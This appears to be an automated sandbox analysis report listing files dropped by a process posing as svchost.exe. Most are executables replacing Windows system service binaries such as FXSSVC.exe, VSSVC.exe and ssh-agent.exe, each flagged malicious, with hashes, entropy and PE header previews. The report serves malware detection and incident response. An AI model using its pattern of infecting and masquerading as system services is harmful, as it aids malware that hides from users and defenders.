                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:SGXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:SGsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:39B7A38B4D293A74193E0AFFD1CF7BBC
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FB749DB9B7A693C9D4C637B5D58003B835CBC7A1
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B10815097808176D53FE97C1FEE51246EB34B369FC983484B978B1542AF2F208
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:627C58B9F0ECEC613ED6A53189C4F6371908FCD7BD9C9B2A306E1D5BC5E4C81C476B52FA0D4346F2A112A2389648CDE812ED1679F3D0925BB7232C95911B0BAA
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........+-.~E~.~E~.~E~...~.~E~..F..~E~..A..~E~.~D~.~E~..D..~E~..@..~E~..L..~E~...~.~E~..G..~E~Rich.~E~................PE..L...CY]..................&...,...............@....@.................................3............ ..........................lQ..@....`..................................T............................................P..h............................text....%.......&.................. ..`.data........@.......*..............@....idata.......P.......,..............@..@.rsrc........`.......8..............@..@.reloc...P.......@...P..............@...........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\System32\AgentService.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1801216
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.974317758912734
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:49152:0wVFr68Vw9wn/6h8N1zidLDmg27RnWGj:0wVFrssC/dLD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:085BAFAFBBA6343A8BA8B383CB55A16F
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:71EC90FD657CB2EED500E52FCDEB665EE1BDE326
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:BA178F45F296265EC96EB6C596809642FA630DFB03C0318821C4270425FB64E2
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:BB97067B33CA3F4941397FE8A050CE7DD203F228ED1EFFB143A3E857C75F8E86DC061DBC9314BA657FBA56DF1F5C82129A433FD5ED3B25CF77D41CEE4292A8FA
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5...qq.Bqq.Bqq.Be..Crq.Be..Ciq.Be..C2q.Be..Cfq.Bqq.BIp.Be..C2q.Be.)Bpq.Be..Cpq.BRichqq.B........PE..d.................".................0..........@.......................................... .......... ......................................X........... ....0...}..................0...T...................(...(...................P................................text............................... ..`.rdata..............................@..@.data...........t..................@....pdata...}...0...~..................@..@.rsrc... ...........................@..@.reloc..............................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\System32\AppVClient.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1348608
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.253735440401379
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:TQW4qoNUgslKNX0Ip0MgHCpoMBOuOsqjnhMgeiCl7G0nehbGZpbD:TQW9BKNX0IPgiKMBOuiDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:CE73AC0BEBC9815C9D34668A399D261C
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:4E6BFABC9B472505D9EB28E33678EDEE73136724
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:A9D39836069333890A0DEEA7353A57D17256EF3B3A0BD1B69CB34A44863BA49B
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:CCAB904A26866E3895E307D0078E7F29E41F0FE0C6377F4BEDCA7B307CB6C3C82AA6EF2B078710903BAA89D7DE8422B8AAFA589373054E3405B030841DCE1FDF
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g..=#p.n#p.n#p.n*.kn%p.n7..o(p.n7..o p.n7..o.p.n#p.n.u.n7..o.p.n7..o.p.n7..n"p.n7..n"p.n7..o"p.nRich#p.n........................PE..d....4............"..........$.......K.........@....................................[..... .......... .......................................j..h....`...a... ...:..................0a..T....................%..(....$...............%..P............................text...L........................... ..`.rdata..............................@..@.data....z.......n..................@....pdata...:... ...<..................@..@.rsrc....a...`...b...2..............@..@.reloc..............................@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1224192
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.1635290193532555
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:X2G7AbHjklsqjnhMgeiCl7G0nehbGZpbD:X2G7AbHjUDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:A1A441EEA47D27CFFA1380B212699472
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:AF1A5D1DC6C9AF6F993EC37DFE9FFD119A65CC95
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:A5E061682C50D572618DDEB6BA504DCBEDCD7B1DA8B196FE108F0B34DE35587D
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:BDDAE8A570549B0BBB6D58D6994F4C56566E816D6DADA4474861099561C92FBFB76C91F2AEB2CF753CE72D2172AA1D8BED1731A5327288409CD144A1A784D835
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B6l0.W.c.W.c.W.c./.cPW.c.<.b.W.c.<.b.W.c.W.c.S.c.<.b.W.c.<.b.W.c.<.b.W.c.<.c.W.c.<.c.W.c.<.b.W.cRich.W.c................PE..d...^.Jw.........."............................@.....................................p.... .......... ......................................p?...................................... #..T...................8...(... ...............`...H............................text............................... ..`.rdata...b.......d..................@..@.data...@....p.......P..............@....pdata...............T..............@..@.rsrc................b..............@..@.reloc...P.......@...n..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\System32\FXSSVC.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1242624
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.288947144941643
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:jkdpSI+K3S/GWei+qNv2uG39sqjnhMgeiCl7G0nehbGZpbD:j6SIGGWei2uG3hDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:82E1FBAFE5AE9628723F49D8C572AFBC
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:16DA6A53B060EFD586A8D9B5ED8F5A1E59D91225
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:A2D3A777413894CC9A9AACB397055507C1A75AE26F9470783D34D93D330455AA
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:8CD6A1946FCB3FFDC1C3AAE3505B859FB3FF7C5434B87B18F46F56D87AFB71ACE2D8EC0D05D729BA614CC1470A905347DC61F55D1AAA11D13F55C0B88A9FE089
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............}x..}x..}x...{..}x...|..}x...y..}x..}y.x|x...p..}x...}..}x......}x...z..}x.Rich.}x.................PE..d................."...... .....................@.............................P............ ..................................................{..h....P...........1......................T...........................pk...............l.......{..@....................text...Y........ .................. ..`.rdata..2u...0...v...$..............@..@.data... H.......<..................@....pdata...1.......2..................@..@.didat.......@......................@....rsrc........P......................@..@.reloc.......`......................@...................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\System32\Locator.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1141248
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.017485008960269
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:MaXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:MasqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:1668426D4049F247816A6509230B04D6
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:8BB2110AFA4F9506CF8A3CF8538303502EFAAB3D
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:4C5AC7B2E5F6828640C7829652A8E187BA2241972E22BF02919524ABEC2AA5FF
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:BD9AC24E1FD1EAAC9855EAFFDB631DF0A7ED14EF4E87302589C90EF4873F7A1BC599F0973CDBD182F7EFC5920EE3DFD6E13344979C408A68C541E86317AA2519
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........C."^".q^".q^".qWZ;qL".qJI.p_".qJI.p\".qJI.pO".q^".qy".qJI.p[".qJI.p]".qJIWq_".qJI.p_".qRich^".q........................PE..d...k(............".........."...... ..........@.......................................... .......... .......................................&.......P.......@......................0#..T............................ ..............(!..p............................text............................... ..`.rdata....... ......................@..@.data........0......................@....pdata.......@....... ..............@..@.rsrc........P......."..............@..@.reloc...P...`...@...*..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\System32\MsDtc\Trace\dtctrace.log

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msdtc.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):16384
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.3225260236830921
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:6:5daAXl8ta/k/uMclF6vMclFq5zwAz8gYbOCzE5Zm3n+SkSJkJIOcuCjHu9+GEAXn:Pl80kqF69Fq5z06CzE5Z2+fqjFIn
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:074A0456AFAD4CC6DB43629BB4285746
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:883CEB9CEE47E0E05F79F2FE17AF5A276ACEA012
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:739894D3F72A72FD9FBC4CA9EF4DC46E5E9B1AB76BC97537EF7489FDD775C4E9
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:94DAC5B312853BE1D015664480034FD467802B7D3D8FBE7972EFF7EEA36C72431B34E91B6F734FBB177284FF2A63881DC612252AE9AB3E6CF78526209B2EDCA1
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.@..X...X.......................................X...!.....................................s.............@......eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1..............................................................O..............-............M.S.D.T.C._.T.R.A.C.E._.S.E.S.S.I.O.N...C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.M.S.D.t.c.\.t.r.a.c.e.\.d.t.c.t.r.a.c.e...l.o.g.............P.P...........s............................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\System32\OpenSSH\ssh-agent.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1511424
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.2228854271889125
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:MObHA4LWOsvAYFTVXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9L:xjL3UTVsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:528551BC5915FF99C29746E159C1E483
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:A521FC2A5E03CBD54A6009DFA93441E11F18573E
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:D02DD3D4DA0497D22CF5F7552F41E2C78FB018B4D188E33AA74AE1B855336131
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:365429B788DC7FD1F15EDB193C5D7A6FF0EEE2C4AE290F45864706C9D5B685CFC7DEBFD4F3893EEE9FB02E88313142699616AFD1C54E8D81DBB85467BF21C7A3
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D|.%...%...%...C...%...C...%...C..{%..*...%...{...%...{...%...{...%...]...%../L...%...%..6$..&{...%..&{.%...%...%..&{...%..Rich.%..................PE..d.....q^.........."..........:.......i.........@....................................F].... ......................................................... ..x.......T*...................P..p...........................`Q..................8............................text............................... ..`.rdata..............................@..@.data....I..........................@....pdata..T*.......,..................@..@.rsrc...x.... ......................@..@.reloc...P...0...@..................@...........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1235968
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.182167075831855
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:CpFtQOZXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:hOZsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:8A50E57282AB78C6D3930BA31E2E66D7
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:080091BDBBB131060603C7AC0B7CC2CFC615343E
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:EC384659FFB85194486FBC0FC258261764D45F508F58EDE4AFCB9F98BFF901A0
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:269C19731568E1A20BD4A74AE301FAC75E65E006EAA78719F12C0884639EED0763137983981A58DB6B65810723D5EBEBFB5579470AF0B602753D7F363A02B038
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@A...A...A...H.......U...K...U...B...A.....U...F...U...N...U...e...U.t.@...U.v.@...U...@...RichA...................PE..d...6............".................0..........@....................................p..... .......... ......................................Xq..........x............................S..T...................(*..(....)..............P*...............................text...@........................... ..`.rdata...n... ...p..................@..@.data...............................@....pdata..............................@..@.rsrc...x...........................@..@.reloc...P.......@..................@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\System32\SearchIndexer.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1513984
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.102373059133159
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:Q3frCoQItLsiLPLe24CxruW4bIhllVsqjnhMgeiCl7G0nehbGZpbD:Q3fzsIPLkCNuVbIhDJDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:FDA59EBB33AFC8972ABEB2B19C0D0FF0
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:DEA9316873F30FAB9EC64F870669B68DE6E92D45
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:D3B13FCCEAD20DCA860BACA647838FE3F6C11423E47FCF5AD0E51AD647151F47
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:29C580EBF2859FC4AF52A7627AEDB5C153ED7E9D8FC0911E65BF4B5F86F006160AD683BC6DB504ED3DFA7C8742818DF47390400EA74F13C2873ECC25BE0ACA5A
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........................z............................................l............Rich............PE..d.................".................0..........@.....................................}.... .................................................HL..........(...........................P...T...................P...(... ........................<.......................text...9........................... ..`.rdata..............................@..@.data....:...........p..............@....pdata..............................@..@.didat.......p......................@....rsrc...(............ ..............@..@.reloc...............*..............@...................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\System32\SensorDataService.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1846784
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.939440308162455
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:aW6BApg2YuyuNDYTabvcRvNYf8km1YsqjnhMgeiCl7G0nehbGZpbD:aF2YuHNETovcvNYf8kmaDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:39A4234D5B8BA6534DB70A8421277A62
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:21872F31A7B5D46FA47262137C1AA633281B4B0E
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:1D19C58AD9011632264A84A1FD14ED31223DD43B9894C5C5F442A2E90A3D1932
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:A62DC5071E0E828FF8C8E276CBCA81894E890C45D84D4C9AAEF538A69E9EFAC0619E9EA5FA1B86FA34E3150A30F6CA04D173DD369D312167548F65AC0FE259C9
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......W`............yA.K...j...........j.....j.....j.....j.0...j-.....j....Rich...........................PE..d................."......"...(......@..........@.............................p............ .......... .......................................~..H....`..`........................... t..T...........................0w..............Hx..p............................text....!.......".................. ..`.rdata..P^...@...`...&..............@..@.data...............................@....pdata..............................@..@.rsrc...`....`.......6..............@..@.reloc.......p.......>..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\System32\Spectrum.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1455616
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.238868443222417
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:PiW6ZvAKF5i/dN9Bdexj9Trk+FZsqjnhMgeiCl7G0nehbGZpbD:PYxF50b9Bdm9TxzDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:B90A4BF24B298B6114E19987A67C9450
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:9F7639D632B86BB2D871E399C53CD72CC7A69AF7
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:0B88F1B446187B988B883C90436A43BF8E2E53B6C02F4A723DF3777C73C8DD5A
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:9E0FE69CB254DD5FB3C7750520C3D85AF82C5E78046CDE1B59FA02612DA3C19E7A81764DCE760E166847943A87F7DEFF0F720BCD41EC215BACEE96DE737F8490
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......zq..>...>...>...7h..D...*{..4...*{..=...>...+...*{..9...*{..V...*{......*{n.?...*{l.?...*{..?...Rich>...........PE..d...)ew..........."................. ~.........@.....................................P.... .......... .................................................. .......@k...................l..T...................@...(...p...............h................................text............................... ..`.rdata.............................@..@.data....8.......*..................@....pdata..@k.......l..................@..@.didat..8....p.......>..............@....rsrc... ............@..............@..@.reloc...............F..............@...........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\System32\TieringEngineService.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1455616
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.47657061842135
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:/JnJ5D3WYssqjnhMgeiCl7G0nehbGZpbD:/JnJ5DGYYDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:022EEAB6B3A6A0E570E90A480C9C1AEB
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:A86D6AFC89D1D4FFA7A7905B0AF8BDE00BEB9B96
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:49A051A6C275C301377AA5FBBF8A9805322389A1C484B5663F436DF387EDDC18
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:C87E59D1FC46429E36532E3AAE79B9F3C5BA83B9C4122F5E87B4BB9BE5E8AD3BD2B185A77E3C07053D3F3C54200DB8EA5D1CE20B7C94DF24D37AA92681324A3C
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........w............nP.....}.....}........Z...}.....}.....}.....}<....}.....Rich............................PE..d................."............................@.....................................^.... .......... ..........................................H...............p....................p..T...................h:..(...P9...............:..@... ...@....................text...|........................... ..`.rdata.......0......................@..@.data...............................@....pdata..p...........................@..@.didat..............................@....rsrc...............................@..@.reloc...P...0...@..................@...................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\System32\VSSVC.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2075136
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.736562685902467
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:49152:CPK86JYTerDjfJ2313e1mP1MdnUHDmg27RnWGj:YD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:4987C6F5CE15189BC89A214D481DE124
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:02CB9C9E40B81BE62394862624602937BF42C3AF
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:FCE918F2481A0C1020D1895562255598519768CF922C76041FBA053DC3B39500
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:837125895186EE239CF1298E4A1C2A0B0F45E3F0AD9AC4C4A7FA2C9A4549FF60A4EF2DFA5093510142D039424F33FAAB0A2A9149B6B68975CF46FFFD6AFB587F
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........@.e.!.6.!.6.!.6.YI6.!.6.J.7.!.6.J.7.!.6.!.6. .6.J.7.!.6.J.7.!.6.J.7.!.6.J%6.!.6.J.7.!.6Rich.!.6........PE..d...b.Xw.........."......v...f.......p.........@.............................. .....|F ... .......... ..................................................@O...0..lx...................o..T............................................................................text....t.......v.................. ..`.rdata..`|.......~...z..............@..@.data...............................@....pdata..lx...0...z..................@..@.didat..P............x..............@....rsrc...@O.......P...z..............@..@.reloc..............................@...................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\System32\alg.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
